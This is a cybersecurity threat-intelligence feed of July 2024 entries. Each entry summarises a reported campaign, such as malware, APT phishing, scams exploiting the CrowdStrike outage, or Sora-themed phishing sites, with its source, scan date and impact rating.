Summary:: Cyble researchers have identified that cybercriminals are exploiting the Sora AI to create fake phishing sites, even before Sora's official release. These criminals are using compromised social media accounts to promote the fake sites, making them seem legitimate. Researchers also found phishing sites named openai-soravideo[.]com and sora-OpenAI-generation[.]com, along with fake Sora AI pages and ZIP files containing malicious scripts that steal sensitive information like login credential, cookies and browser data.

Source: https://cyble.com/blog/threat-actors-exploit-sora-ai-themed-branding-to-spread-malware/

Intel Source:: ThreatMon

Intel Name:: Analysis_of_AzzaSec_Ransomware

Date of Scan:: 2024-07-31

Impact:: LOW

Summary:: AzzaSec Ransomware, which is created by the AzzaSec Hacktivist Group, is a serious cyber threat, due to its sophisticated and undetectable nature. It can be downloaded via compromised Windows servers or phishing emails with an attached PDF dropper. Once activated, it encrypts files using AES encryption with an extension AzzaSec_Encryptor focusing on 120 file formats. To avoid being detected, the ransomware uses different anti-detection techniques and maintains persistence by putting itself in the Startup directory. The victims are asked for a ransom of $600 furthermore they are put under pressure in the form of system background change and threatening audio messages.

Source: https://45734016.fs1.hubspotusercontent-na1.net/hubfs/45734016/AzzaSec%20Ransomware%20Technical%20Malware%20Analysis%20Report.pdf.pdf?__hstc=205617164.4ca88179e9c4de00be257a0ec5f4dee7.1721037753230.1721285822323.1722410051589.4&__hssc=205617164.2.1722410051589&__hsfp=1054730769

Intel Source:: CTFIOT

Intel Name:: Donot_Group_Carry_Out_Phishing_Attacks

Date of Scan:: 2024-07-31

Impact:: LOW

Summary:: During routine threat hunting efforts, CTFIOT analysts came across a sample associated with phishing attempts. It was disguised as “The seventh COMAC International Science and Technology Innovation Week” sponsored by Commercial Aircraft Corporation of China Ltd. and others. A homology analysis conducted on the sample showed that it linked to Donot APT group.

Source: https://www.ctfiot.com/196353.html

Intel Source:: F.A.C.C.T

Intel Name:: The_XDSpy_Group_Attacks

Date of Scan:: 2024-07-31

Impact:: MEDIUM

Summary:: A cyberespionage group known as XDSpy recently targeted organizations in Russia and Transnistria, Moldova, with a new malware variant. The group sent out phishing emails with links to archives that contained legitimate executable files for the installation of the XDSpy.DSDownloader tool. With this tool, they could secretly run malicious code. Russian cybersecurity firm F.A.C.C.T. found these attacks but has not said if any breached system or stolen information happened or not.

Source: https://habr.com/ru/companies/f_a_c_c_t/news/831420/

Intel Source:: Rewterz

Intel Name:: A_Deep_Dive_into_Donot_Threat_Actor

Date of Scan:: 2024-07-30

Impact:: LOW

Summary:: Rewterz researchers have identified a threat actor called APT-C-35 also known as the Donot APT Group has been active since 2013. This group is involved in cyber espionage and intellectual property theft, targeting government and military organizations, as well as companies in the aerospace, defense, and high-tech sectors primarily in South Asia but also in the US and Europe. Their tactics include spear-phishing emails, custom malware, and techniques to avoid detection such as encryption and file-less malware. The Donot APT Group is known to be well-funded, well-resourced, and highly skilled.

Source: https://www.rewterz.com/threat-advisory/donot-apt-group-targeting-pakistan-active-iocs

Intel Source:: ESET

Intel Name:: Multiple_Malware_target_Polish_Business

Date of Scan:: 2024-07-30

Impact:: LOW

Summary:: ESET researchers have uncovered a large phishing campaign targeting small and medium-sized businesses primarily in Poland as well as Italy and Romania. These attacks spread malware like Agent Tesla, Formbook, and Remcos RAT using compromised email accounts and company servers. The phishing emails contained RAR or ISO attachments to install the malware. The attackers use the tool DBatLoader to deliver the malware. This tool is downloaded more malware from sources like Microsoft OneDrive or hacked company servers. The malware steals sensitive information to help in future attacks.

Source: https://www.welivesecurity.com/en/eset-research/phishing-targeting-polish-smbs-continues-modiloader/

Intel Source:: Cyfirma

Intel Name:: A_Python_Based_Mint_Stealer

Date of Scan:: 2024-07-30

Impact:: LOW

Summary:: The Mint Stealer malware variant has been extensively analyzed by the CYFIRMA research team. This type of information stealer is designed to capture important data, and functions within a malware-as-a-service (MaaS) model. Mint Stealer is a malware that uses sophisticated evasion techniques and it was built with Nuitka Python compiler to offer more functionalities through Python’s dynamically loaded modules.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_mint-stealer-study-of-a-python-based-information-activity-7223932541236338691-6jTU?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: Walmart Global Tech Blog

Intel Name:: Investigating_Zloader_and_Silentnight_Malware

Date of Scan:: 2024-07-30

Impact:: LOW

Summary:: Researchers at Walmart Global Tech have investigated a new variant of Zloader/Silentnight that exposes a hidden Powershell backdoor and VBS downloader. This malware variant, which CISA has openly linked to BlackBasta, likely works with the new Zloader variant. The Powershell backdoor appears intended to promote further access through reconnaissance activities and deploy other malware samples, including Zloader.

Source: https://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850

Intel Source:: Checkmark

Intel Name:: Malicious_PyPI_Package_Targeting_MacOS

Date of Scan:: 2024-07-29

Impact:: MEDIUM

Summary:: Checkmarx researchers have found that the Python package "lr-utils-lib" included undetected harmful code during a recent investigation. Upon installation, the code targets macOS systems and tries to send Google Cloud Platform credentials to a remote server in an attempt to steal them. They also found a link to an impostor LinkedIn profile purporting to be the CEO of Apex Companies, LLC, named "Lucid Zenith," suggesting the possibility of social engineering.

Source: https://checkmarx.com/blog/malicious-python-package-targets-macos-developers-to-access-their-gcp-accounts/

Intel Source:: Cyber5w

Intel Name:: CyberGate_Malware

Date of Scan:: 2024-07-29

Impact:: LOW

Summary:: Researchers from Subex Secure have identified a malware called CyberGate Remote Access Trojan (RAT). This malware allows attackers to remotely take control of a victim's computer from anywhere in the world. Attackers use this to steal private information like passwords and files, and it might also be used to install other malicious software on the compromised systems.

Source: https://blog.cyber5w.com/cybergate-malware-analysis

Intel Source:: Threatdown

Intel Name:: A_Phishing_Campaign_Using_Discord_CDN

Date of Scan:: 2024-07-29

Impact:: LOW

Summary:: Researchers from Threatdown have observed a new phishing campaign that uses Discord’s Content Delivery Network (CDN) infrastructure to deliver malicious payloads. Researchers found the subsequent chain of malicious activity; they alerted the client, who quickly isolated the endpoint from the network.

Source: https://www.threatdown.com/blog/new-phishing-campaign-uses-discord-for-payload-delivery/

Intel Source:: Huntress

Intel Name:: Exploiting_Fake_DICOM_Viewer_Hack

Date of Scan:: 2024-07-29

Impact:: LOW

Summary:: Researchers from Huntress have found that hackers are targeting medical organisations and misleading users during the installation of a trusted program. Instead of downloading the legitimate software, users are being tricked into downloading a malicious version. The Huntress researchers observed some strange activity involving secure connections (SSH) that started from a DICOM viewer installer, which is a program used to view medical images. While the viewer itself seemed genuine, the SSH activity raised suspicions.

Source: https://www.huntress.com/blog/when-trust-becomes-a-trap-how-huntress-foiled-a-medical-software-update-hack

Intel Source:: Harfanglab

Intel Name:: Analysis_of_Russian_Doppelganger_Info_Operations

Date of Scan:: 2024-07-29

Impact:: MEDIUM

Summary:: Harfanglab researchers have explored Russian-led Doppelganger information operations from early June to late July 2024, caused by the sudden French snap general election of this period. Doppelganger operations include manipulating social networks and digital media by posing as popular news websites to promote Russia's interests. This term has been widely covered by public sources both from the government and private sector since it was first made public in 2022. The paper offers a threat intelligence view on these operations concentrating on their strategies, infrastructure, and reasons in Europe and USA with a special focus on its outcome for France in the context of election.

Source: https://harfanglab.io/en/insidethelab/doppelganger-operations-europe-us/

Intel Source:: Blackberry

Intel Name:: SideWinder_New_Infrastructure

Date of Scan:: 2024-07-29

Impact:: MEDIUM

Summary:: BlackBerry Researchers have identified a new campaign by the nation-state threat actor SideWinder, targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea. SideWinder has upgraded its infrastructure and is using new tactics to compromise victims. The campaign targets Pakistan, Egypt, and Sri Lanka, with further targeting in Bangladesh, Myanmar, Nepal, and the Maldives. The attack involves spear-phishing emails containing malicious documents designed to evoke strong emotions, causing the recipient to download and open the infected files.

Source: https://blogs.blackberry.com/en/2024/07/sidewinder-targets-ports-and-maritime-facilities-in-the-mediterranean-sea

Intel Source:: Guardio Labs

Intel Name:: EchoSpoofing_Phishing_Campaign

Date of Scan:: 2024-07-29

Impact:: LOW

Summary:: Guardio Labs has discovered a critical exploit in Proofpoint’s email protection service, dubbed "EchoSpoofing," allowing threat actors to send millions of perfectly spoofed phishing emails from high-profile brands. These emails, leveraging Proofpoint’s infrastructure and authenticated with SPF and DKIM signatures, bypassed major security protections to deceive recipients and steal credit card details. The campaign involved abusing Microsoft Office365 accounts and Proofpoint's email relay servers. Upon discovery, Guardio collaborated with Proofpoint to mitigate the issue and protect their customers.

Source: https://labs.guard.io/echospoofing-a-massive-phishing-campaign-exploiting-proofpoints-email-protection-to-dispatch-3dd6b5417db6

Intel Source:: ASEC

Intel Name:: Unmasking_SnakeKeylogger_Malware

Date of Scan:: 2024-07-29

Impact:: LOW

Summary:: Researchers from ASEC have observed a malware campaign spreading through email. This malware, named SnakeKeylogger, is a type of infostealer written in .Net language, which is characterized by data exfiltration methods such as email, FTP, SMTP, or Telegram. This malware is encrypted in a file within the %Temp% directory and the attacker uses different methods depending on the system to activate it.

Source: https://asec.ahnlab.com/ko/68461/

Intel Source:: Google Cloud

Intel Name:: UNC4393_SILENTNIGHT

Date of Scan:: 2024-07-29

Impact:: MEDIUM

Summary:: Mandiant's Managed Defense detected multiple intrusions involving QAKBOT, leading to the identification of UNC4393, the primary user of BASTA ransomware. This financially motivated threat cluster has targeted over 40 organizations across various industries, recently including healthcare. UNC4393 typically gains initial access via phishing emails that deliver QAKBOT, and has evolved from using readily available tools to developing custom malware. They operate a private affiliate model for BASTA ransomware, focusing on strategic partnerships for initial access rather than public recruitment. UNC4393 has been observed deploying a variety of malware, including SYSTEMBC, KNOTWRAP, KNOTROCK, DAWNCRY, PORTYARD, and COGSCAN, and has a rapid operational tempo with a median time to ransom of 42 hours. They have shifted from manual ransomware deployment to using tools like KNOTROCK to streamline operations.

Source: https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight/

Intel Source:: Trellix

Intel Name:: OneDrive_Pastejacking

Date of Scan:: 2024-07-29

Impact:: MEDIUM

Summary:: Researchers at Trellix have identified a sophisticated phishing and downloader campaign targeting Microsoft OneDrive users, leveraging social engineering tactics to deceive users into executing a PowerShell script and compromising their systems. The attack begins with an email containing an HTML file that, when opened, displays a fake Microsoft OneDrive page with an error message urging the user to update their DNS cache. Clicking the "How to fix" button initiates a series of steps leading the user to execute a Base64 encoded command via PowerShell, ultimately downloading and executing malicious files.

Source: https://www.trellix.com/blogs/research/onedrive-pastejacking/

Intel Source:: Morphisec

Intel Name:: IT_Crash_Fallout

Date of Scan:: 2024-07-26

Impact:: HIGH

Summary:: Researchers from Morphisec have found that a recent faulty configuration file in CrowdStrike's Falcon platform caused a significant IT disruption, making millions of Windows machines unusable. This multi-day outage affected crucial sectors such as airlines, banks, and hospitals. The incident highlighted the significant responsibility and potential risks of allowing third-party security solutions to access the kernel.

Source: https://blog.morphisec.com/blast-radius-fallout-strengthening-cyber-resilience-after-the-largest-it-crash

Intel Source:: CERT-UA

Intel Name:: Activity_of_UAC_0102_Group

Date of Scan:: 2024-07-26

Impact:: LOW

Summary:: CERT-UA researchers have found the UAC-0102 group distributing emails with attachments in the form of archives containing an HTML file. opening the file redirects the user to a web resource that imitates the web page of the UKR.NET service. If the user enters their login and password, the authentication data is sent to the attackers, and a document is downloaded to the victim's computer as a bait.

Source: https://cert.gov.ua/article/6280183

Intel Source:: Wiz blog

Intel Name:: Hackers_Exploiting_Selenium_Grid

Date of Scan:: 2024-07-26

Impact:: LOW

Summary:: Wiz researchers have observed an ongoing threat campaign called “SeleniumGreed” where hackers exploit exposed Selenium Grid services to mine cryptocurrency. They are Selenium WebDriver features to run Python scripts that download a XMRig miner.

Source: https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps

Intel Source:: ASEC

Intel Name:: LummaC2_Malware_Update

Date of Scan:: 2024-07-26

Impact:: LOW

Summary:: ASEC Researcher have observed LummaC2 which is a malware designed to steal information, disguised as illegal software like cracks, keygens, and game hacks. It spreads through websites, YouTube, LinkedIn and search engine ads that mimic pages for Notion, Slack, and Steam. It can be delivered as a single EXE file or a compressed file with a malicious DLL. LummaC2 has changed dynamically, and its new version can use a legitimate website to change the C2 domain whenever the attacker wants.

Source: https://asec.ahnlab.com/en/68309/

Intel Source:: Google Cloud

Intel Name:: Exploiting_APT45

Date of Scan:: 2024-07-26

Impact:: MEDIUM

Summary:: Mandiant researchers have observed that APT45 has been involved in various cyber operations that aligned with the shifting geopolitical interests of the North Korean state. Initially, APT45 focused on spying on government agencies and defense industries. Recently, they have shifted to financially-motivated operations, targeting the financial sectors.

Source: https://cloud.google.com/blog/topics/threat-intelligence/apt45-north-korea-digital-military-machine

Intel Source:: PaloAlto

Intel Name:: Domain_Hosting_Pages_For_Paris_Olympics_Scams

Date of Scan:: 2024-07-26

Impact:: LOW

Summary:: Researchers at PaloAlto have cautioned users about fake Paris 2024 Olympic scams. They uncovered a large number of domains, including recently registered ones, that offered fake internet data giveaways. These scam pages request a phone number, trick victims into sharing with WhatsApp friends, and promote more false surveys.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-07-25-Paris-2024-Olympics-scams.txt

Intel Source:: ASEC

Intel Name:: Malicious_LNK_Targeting_Financial_Entities

Date of Scan:: 2024-07-26

Impact:: LOW

Summary:: ASEC researchers have identified a new campaign targeting domestic financial entities using malicious LNK sent through emails with malicious URLs. The URL download a ZIP file name Request for confirmation of project information in accordance with the request of financial authorities.zip. However malicious ZIP file is downloaded, it includes a regular PDF and a fake Excel file. The PDF requests updates on cryptocurrency projects to trick users into opening the file, which hides PowerShell commands and hard to detect. The scripts then steal user information and download more malicious files, sending the stolen data to a specific URL.

Source: https://asec.ahnlab.com/ko/68266/

Intel Source:: CrowdStrike

Intel Name:: New_Phishing_Scam_Targeting_German_Customers

Date of Scan:: 2024-07-26

Impact:: HIGH

Summary:: A spearphishing endeavor involving a counterfeit CrowdStrike Crash Reporter installer that is widespread through a German organization’s mimicking website has been identified by CrowdStrike Intelligence. It is noteworthy to report that the website was registered with a sub-domain registrar and appears to have been created on July 20, 2024, one day after an issue that affected Windows operating systems and was found in a single content update for CrowdStrike's Falcon sensor was discovered and fixed.

Source: https://www.crowdstrike.com/blog/malicious-inauthentic-falcon-crash-reporter-installer-spearphishing/

Intel Source:: Esentire

Intel Name:: Gh0stGambit_A_New_Variant_of_Gh0stRAT

Date of Scan:: 2024-07-26

Impact:: LOW

Summary:: Researchers from eSentire have discovered several Gh0st RAT infections originating from fake Chrome browser installer packages. These infections start with a new variant called Gh0stGambit, which is designed to secretly download and run encrypted malware. The malware is downloaded when users search for Chrome online and try to download a file named ChromeSetup.msi. The operation targets entities such as embassies, foreign ministries, government offices, and the Dalai Lama's Tibetan exile centers in India, London, and New York City.

Source: https://www.esentire.com/blog/a-dropper-for-deploying-gh0st-rat

Intel Source:: PaloAlto

Intel Name:: New_Variants_of_Golang_Based_Ransomhub_Ransomware

Date of Scan:: 2024-07-26

Impact:: LOW

Summary:: PaloAlto researchers have discovered new variations of Golang-based Ransomhub ransomware, which tout enhanced features such as quick encryption and avoiding VM shutdowns while using the same gobfuscate obfuscation approach as before.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-07-24-new-Ransomhub-verson-or-variant.txt

Intel Source:: Threatdown

Intel Name:: Rhysida_Exploiting_Oyster_Backdoor

Date of Scan:: 2024-07-25

Impact:: LOW

Summary:: Researchers from Threatdown have discussed the Rhysida hacker group, which is exploiting a new variant of the Oyster backdoor initially discovered by Rapid7 in late June 2024, that uses SEO-poisoned search results to trick users into downloading malicious installers. These installers masquerade as legitimate software, such as Google Chrome and Microsoft Teams, but instead drop the Oyster backdoor. On July 10, an Oyster backdoor was deployed on a customer endpoint, likely originating from a malicious IP scanner distributed via malvertising. This malicious DLL associated with this attack communicates with a malicious domain, which ThreatDown researchers identified as an Oyster C2 server.

Source: https://www.threatdown.com/blog/rhysida-using-oyster-backdoor-to-deliver-ransomware/

Intel Source:: Cyfirma

Intel Name:: Overview_of_Flame_Stealer

Date of Scan:: 2024-07-25

Impact:: LOW

Summary:: A highly advanced malware dubbed Flame Stealer, first advertised on Telegram, is designed to avoid detection and steal sensitive data. It is written in C/C++, runs on Discord, and its targets are people in Portuguese speaking communities. This malicious software collects autofill data, cookies, and session information from social media platforms like Instagram, TikTok, Spotify, Roblox, and Discord. It uses DLL side-loading for running malevolent payloads and with Windows start-up it achieves a persistence state. Sends stolen data to a specified webhook, potentially allowing remote access to stolen information.

Source: https://www.cyfirma.com/research/flame-stealer/

Intel Source:: Symantec

Intel Name:: Rising_of_AI_Driven_Threats

Date of Scan:: 2024-07-25

Impact:: LOW

Summary:: Researchers at Symantec have observed an increase in cyber attacks by using AI tools called Large Language Models. These attacks often come through phishing emails with malicious file attachments. These files run PowerShell scripts generated by AI which then downloads various malware like Rhadamanthys, NetSupport, CleanUpLoader (Broomstick, Oyster), ModiLoader (DBatLoader), LokiBot, and Dunihi (H-Worm). These attacks target different sectors and often use urgent-looking phishing emails with attachments that download malware.

Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/malware-ai-llm

Intel Source:: Rapid7

Intel Name:: Fake_W2_Form_Delivers_Malware

Date of Scan:: 2024-07-25

Impact:: LOW

Summary:: Rapid7 researchers have discovered a malware campaign targeting users searching for W2 forms on the Microsoft search engine Bing. In this campaign, attackers trick users into downloading JavaScript files that appear to be W2 forms from a fake IRS website. When users run these files, they execute a Microsoft Software Installer (MSI) package that contains the Brute Ratel badger. Once Brute Ratel executes, it downloads the Latrodectus malware, which allows attackers to control the compromised machine, execute remote commands, and install more malware.

Source: https://www.rapid7.com/blog/post/2024/07/24/malware-campaign-lures-users-with-fake-w2-form/

Intel Source:: Microsoft

Intel Name:: Onyx_Sleet

Date of Scan:: 2024-07-25

Impact:: MEDIUM

Summary:: Microsoft has reported on on Onyx Sleet, a North Korean cyber threat actor active since 2014. This group conducts cyber espionage targeting military, defense, and technology industries, primarily in India, South Korea, and the United States. Onyx Sleet uses a variety of custom and open-source tools, including remote access trojans (RATs) and exploits for known vulnerabilities. The group's primary goal is intelligence gathering, but it has recently expanded into financial gain. Microsoft has collaborated with the FBI to track Onyx Sleet's activities, which have led to a U.S. Department of Justice indictment of an individual linked to the group

Source: https://www.microsoft.com/en-us/security/blog/2024/07/25/onyx-sleet-uses-array-of-malware-to-gather-intelligence-for-north-korea/

Intel Source:: PaloAlto

Intel Name:: Accelerating_Malware_Analysis

Date of Scan:: 2024-07-25

Impact:: LOW

Summary:: PaloAlto researchers have discussed some of the ways that security professionals analyze and prioritize multiple malware samples efficiently. Using tools like malware configuration extractors (MCE), experts can detect malware families, quickly and extract crucial indicators of compromise (IoCs) which will make cyber responders lives easier. Also, examined and extracted the C2 server address from the sample. Pivoting on this information revealed a Bitbucket repository with the second-stage payloads. Further inquiry uncovered ten additional samples hosted and distributed from the same repository.

Source: https://unit42.paloaltonetworks.com/accelerating-malware-analysis/

Intel Source:: ASEC

Intel Name:: Xworm_Malware_Distributed_as_a_URL_File

Date of Scan:: 2024-07-25

Impact:: LOW

Summary:: ASEC researchers have identified that attackers mimicked PayPal and sent an email with an attachment of fake invoice. This attachment contains a shortcut file called Payment_information.url that downloads more malicious files from a network shared folder. When file is downloaded, it contains an executable called Xworn malware. Xworm has capabilities of replicate itself, run itself and communicate with C2 servers. It can perform various malicious actions like downloading files, shutting down the PC, executing commands, DDoS attacks, keylogging, and screen capture.

Source: https://asec.ahnlab.com/ko/68115/

Intel Source:: AnyRun

Intel Name:: Latrodectus_Loaded_by_Brute_Ratel_C4_Badger

Date of Scan:: 2024-07-25

Impact:: LOW

Summary:: A recently found malware loader called Latrodectus could be the IcedID malware’s potential successor. The similarities in development and behavior make security researchers of view that Latrodectus may have been developed by the same threat actor group that created IcedID. It is one of those kinds of malware loaders that are used in infecting a compromised system with more advanced types of malware.

Source: https://any.run/cybersecurity-blog/brute-ratel-c4-analysis/

Intel Source:: CrowdStrike

Intel Name:: Fake_Crowdstrike_Update_Spread_Lumma_Stealer

Date of Scan:: 2024-07-25

Impact:: HIGH

Summary:: Researchers from CrowdStrike have discovered a phishing domain crowdstrike-office365[.]com which pretends to be CrowdStrike. This site spreads malicious ZIP and RAR files containing an MSI installer. This installer runs the Lumma Stealer malware packed with CypherIt. The MSI installer shows a fake installation screen, then extracts and runs more malicious files including an installer SymposiumTaiwan.exe which uses complex tricks to hide its real code.

Source: https://www.crowdstrike.com/blog/lumma-stealer-with-cypherit-phishing-lure/

Intel Source:: CheckPoint

Intel Name:: Unveiling_the_Stargazers_Ghost_Network

Date of Scan:: 2024-07-24

Impact:: MEDIUM

Summary:: Researchers from Check Point have discovered a network on GitHub accounts dubbed Stargazers Ghost Network, that distributes malware and malicious links via phishing repositories. This operation is called Distribution as a Service (DaaS) and allows attackers to spread the malicious payload by hiding it within phishing repositories that look like normal projects. Assembled under the name Stargazer Goblin, this network is overseen by a group that uses different tactics such as starring and forking repositories to make them look more credible. The list of distributed malware includes many families like Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine.

Source: https://research.checkpoint.com/2024/stargazers-ghost-network/

Intel Source:: ISC.SANS

Intel Name:: Malicious_Python_Script_Mouse_Logger

Date of Scan:: 2024-07-24

Impact:: LOW

Summary:: Researchers at ISC.SANS have seen Keylogging, as a popular malware feature because it can steal valuable information like usernames and passwords typed on keyboards. During the recent analysis of SANSFIRE incident response data, for instance, they discovered a Pyton-malware program that, apart from having common functionality such as a keylogger and screenshot grabber, also came with a new mouse logger. This means it does not only keep track of typed keys but also mouse movements and clicks made by users.

Source: https://isc.sans.edu/diary/Mouse+Logger+Malicious+Python+Script/31106/

Intel Source:: CERT-UA

Intel Name:: Activity_of_UAC_0057_Group

Date of Scan:: 2024-07-24

Impact:: LOW

Summary:: CERT-UA researchers have observed increased activity from the UAC-0057 group between July 12 and 18, 2024. The PICASSOLOADER malware was being distributed by this group through documents with macros that were intended for installing Cobalt Strike Beacon on victim's computers. Documents such as oborona.rar, Tax_2024.xls, and others included materials mainly related to the reform of local self-government bodies, taxation, and financial indicators; files connected with the USAID/DAI "HOVERLA" project were also identified among them. It is possible that project office specialists and workers within Ukrainian local self-governance systems were among the targets of interest.

Source: https://cert.gov.ua/article/6280159

Intel Source:: CrowdStrike

Intel Name:: Fake_Crowdstrike_Update_Spread_Python_Info_Stealer

Date of Scan:: 2024-07-24

Impact:: HIGH

Summary:: CrowdStrike researchers have identified a malicious ZIP file called CrowdStrike Falcon.zip, which contains a Python-based info stealer called Connecio. This info stealer started distributing just after the CrowdStrike incident happened. The ZIP file pretends to be a Falcon update and runs the Connecio information stealer, which collects system data, external IP addresses, and browser data. The stealer communicates with its control servers via URLs on Pastebin.

Source: https://www.crowdstrike.com/blog/threat-actor-distributes-python-based-information-stealer/

Intel Source:: Sekoia

Intel Name:: Qyad7_Botnet_Target_TP_Link_Routers

Date of Scan:: 2024-07-24

Impact:: LOW

Summary:: Sekoia researchers uncovered the 7777 botnet also known as the Quad7 botnet. It uses compromised TP-Link routers to carry out slow brute force attacks on Microsoft 365 accounts worldwide. The botnet disables the routers' management interface to avoid detection and is linked to long-term business email compromise (BEC) cybercriminals, not APTs. It primarily performs password spraying instead of brute force attacks and targets a wide range of Microsoft 365 accounts. The Quad7 botnet mainly affects Bulgaria, France, Russia, the US, and Ukraine.

Source: https://blog.sekoia.io/solving-the-7777-botnet-enigma-a-cybersecurity-quest/

Intel Source:: ANY.RUN, Reliaquest, SOCRadar, Cyble

Intel Name:: CrowdStrike_Outage_Updated_IOCs

Date of Scan:: 2024-07-24

Impact:: HIGH

Summary:: Additional Source: https://www.reliaquest.com/blog/crowdstrike-outage-script-phishing-and-social-engineering-attacks/ https://socradar.io/suspicious-domains-exploiting-the-recent-crowdstrike-outage/ https://cyble.com/blog/threat-actors-exploit-recent-crowdstrike-outage-to-ramp-up-suspicious-domain-creation/ Multiple cybersecurity firms have observed that threat actors are exploiting the massive business disruption from CrowdStrike glitchy update on Friday to target companies with data wipers and remote access tools. ReliaQuest researchers have warned against the fake PowerShell and Batch scripts posing as fixes, likely to appear on platforms like GitHub. These scripts are capable of installing malicious software like Cobalt Strike, which allows unauthorized access to systems. AnyRun and SOCRadar researchers have observed a surge in phishing scams and malware targeting users impacted by the CrowdStrike incident, often disguised as legitimate updates or hotfixes. Moreover, Cyble researchers have analyzed suspicious domains registered by hackers who took advantage of the CrowdStrike outage.

Source: https://any.run/cybersecurity-blog/crowdstrike-outage-abuse/

Intel Source:: Antiy

Intel Name:: Fake_Repair_Files_Use_in_Crowdstrike_Issue

Date of Scan:: 2024-07-24

Impact:: HIGH

Summary:: Researchers at Antiy CERT have discovered that cyber criminals are taking advantage of the CrowdStrike issue to spread malware, including RemCos remote control, a data-stealing Trojan, and a data-erasing wiper. Researchers also found that threat actors are using fake repair documents embedded with hidden macros that download a Trojan, which steals sensitive information from browsers and sends it to a command server. In another case, the Handala Hack group conducts phishing campaigns disguised as CrowdStrike support, targeting Israeli institutions and spreading malicious code through fake repair documents.

Source: https://www.antiy.cn/research/notice&report/research_report/Disguise_CrowdStrike_Trojan.html

Intel Source:: Fortinet

Intel Name:: Exploiting_CVE_2024_21412

Date of Scan:: 2024-07-24

Impact:: MEDIUM

Summary:: Researchers at FortiGuard Labs have uncovered a malicious campaign exploiting a security flaw known as CVE-2024-21412. In this campaign, attackers trick victims into clicking a link that downloads a harmful LNK file onto their computer. This file then downloads another program containing a hidden script. When run, the script activates, decrypts hidden PowerShell code, and accesses more files and URLs, including fake PDF documents and a harmful code injector. These files work together to install a data-stealing program into legitimate processes on the victim's computer, ultimately sending the stolen data back to the attackers' command-and-control server.

Source: https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed

Intel Source:: Knownsec 404 team

Intel Name:: Patchwork_Group_Using_Brute_Ratel_C4_and_PGoShell

Date of Scan:: 2024-07-24

Impact:: LOW

Summary:: Knownsec 404 Advanced Threat Intelligence Team have identified a suspected cyber attack by the Patchwork group that targeting Bhutan. The attack has an updated variant of the Go language backdoor known as PGoShell, which significantly enhances its functionality. What makes this different from any other attacks is the inclusion of Brute Ratel C4, a red team tool into their arsenal for the first time. Over the last two years, the Patchwork group has shown steady progress in terms of technology where they constantly refresh their techniques and increase the number of trojans and upload mechanisms.

Source: https://medium.com/@knownsec404team/the-patchwork-group-has-updated-its-arsenal-launching-attacks-for-the-first-time-using-brute-ratel-175741987d87

Intel Source:: CloudSEK

Intel Name:: BORN_Group_Supply_Chain_Breach

Date of Scan:: 2024-07-24

Impact:: MEDIUM

Summary:: CloudSek researchers have examined a major supply chain attack on IT service provider BORN Group. The threat actor, Intelbroker, exploited CVE-2024-23897 to break into BORN Group’s systems and extract sensitive data from many customers. Besides that, in this attack Intelbroker claims to have successfully breached the Market database which has lead to personal information of approximately 196,000 being exposed.

Source: https://www.cloudsek.com/blog/born-group-supply-chain-breach-in-depth-analysis-of-intelbrokers-jenkins-exploitation

Intel Source:: Cyble

Intel Name:: Operation_ShadowCat

Date of Scan:: 2024-07-24

Impact:: LOW

Summary:: Researchers at CRIL have discovered a fake Office document which is a shortcut (.LNK) file. When a user opens this file, it starts running a PowerShell command to execute and drop a .NET loader onto the victim’s machine. This PowerShell script then fetches a hidden payload from a PNG image on a remote server and injects it into the PowerShell process to avoid detection. This attack is called Operation ShadowCat. The payload is a RAT which written in Go to control the infected machine and deploy ransomware. The campaign targets individuals interested in Indian politics, including government officials, political analysts, journalists who follow parliamentary activities closely.

Source: https://cyble.com/blog/operation-shadowcat-targeting-indian-political-observers-via-a-stealthy-rat/

Intel Source:: K7 Security Labs

Intel Name:: Threat_Actors_Target_Recent_Election_Results

Date of Scan:: 2024-07-23

Impact:: LOW

Summary:: Researchers at K7 Security Labs discovered the malware called Crimson RAT being used in recent Indian Election results. This RAT is being used by the threat actor Transparent Tribe, a group believed to operate out of Pakistan, and it has been active since 2013. Crimson RAT is capable of stealing credentials, gather system information, monitor running processes, delete files, and download more malware. Researchers also found an Excel file disguised as a Syllabus of a University in Delhi. Their primary focus is on infiltrating diplomatic, defence, and research entities located in India and Afghanistan.

Source: https://labs.k7computing.com/index.php/threat-actors-target-recent-election-results/

Intel Source:: ANY RUN

Intel Name:: Recent_Activities_of_BlackBasta_Ransomware

Date of Scan:: 2024-07-23

Impact:: LOW

Summary:: Researchers at AnyRun have identified new operations involving BlackBasta ransomware that Storm-1811 has managed since its appearance in 2022. This malware uses double extortion techniques where it encrypts data and then asks for money through spear-phishing to gain first entrance. QakBot and Cobalt Strike are some of the tools used by this notorious BlackBasta, which exploits system vulnerabilities and employs sophisticated obfuscation techniques to evade detection.

Source: https://any.run/malware-trends/blackbasta/?utm_source=twitter&utm_medium=post&utm_campaign=blackbasta&utm_content=blog&utm_term=220724

Intel Source:: Symantec

Intel Name:: Daggerfly_Update_Their_Toolset

Date of Scan:: 2024-07-23

Impact:: LOW

Summary:: Researchers at Symantec have uncovered the new toolkit of the espionage group called Daggerfly, also known as Evasive Panda or Bronze Highland. This group has been active for over a decade and is known for its MgBot framework. They have introduced new malware and updated their Macma macOS backdoor. Additionally, Daggerfly introduced Suzafk, a Windows backdoor that can use TCP or OneDrive for command-and-control. These tools share a common code library, showing their connection to Daggerfly. The group is using these new tools in recent attacks on organizations in Taiwan and a U.S. NGO based in China.

Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/daggerfly-espionage-updated-toolset

Intel Source:: Securonix

Intel Name:: CrowdStrike_Outage_Exploitation_Via_Malware_and_Ecrime

Date of Scan:: 2024-07-23

Impact:: HIGH

